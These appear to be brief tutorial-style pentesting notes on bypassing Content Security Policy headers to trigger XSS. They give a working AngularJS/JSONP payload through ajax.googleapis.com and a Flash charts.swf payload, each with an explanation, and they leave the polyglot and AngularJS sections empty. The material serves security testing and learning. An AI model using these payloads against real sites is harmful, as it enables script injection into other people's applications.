[CSP HEADER BYPASS]
CSP: content security policy | its a way to restrict what is allowed in the application Notes: 1. 'self' means it allows from same domain. 2. CSP policy is defined in the response header, this is how browser knows the CSP policy is in place 3. use the dev tools when testing and inspect using the console tab to see if any 'alert' notification pop-up.bypass via ajax.googleapis.com
sample: content-security-policy: script-src 'self' ajax.googleapis.com payload:<div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="//ajax.googleapis.com/ajax/libs/angularjs/1.6.6/angular.min.js"></script> <script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>ng-app: enables angular js usage ng-csp: enables angular js CSP mode ng-click: enables angular js click method explanation: basically the div is enabling some features (ng-app / ng-csp / ng-click) so it can be used by angular js as 'ajax.googleapis.com' is allowed. as the div is calling angular it is needed to import the library to use the functions to call more actions. async ;source is allowing the automatic interaction needed to pop-up the click event.bypass via flash file
sample: content-security-policy: script-src 'self' payload:<object type='application/x-shockwave-flash' data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowed Domain=\%22})))}catch(e) {alert(/XSS/)}//'><param name='AllowScriptAccess' value='always'></object>Notes: 1. this content security policy only allows scripts from the same domain itself. 2. it is only restricting scripts, but how about flash files ? ajax.googleapis.com is not explicitely allowed, however, via flash files it can be call it. 3. each time you want to try flash csp by pass you need to use the HTML tag 'object' 4. 'charts.swf' is a vulnerable flash file to XSS, if not working, you can set your own or find other to trigger XSS.bypass via polyglot file
sample: content-security-policy: default-src 'self'bypass via angularJS
©® - 2023/2024.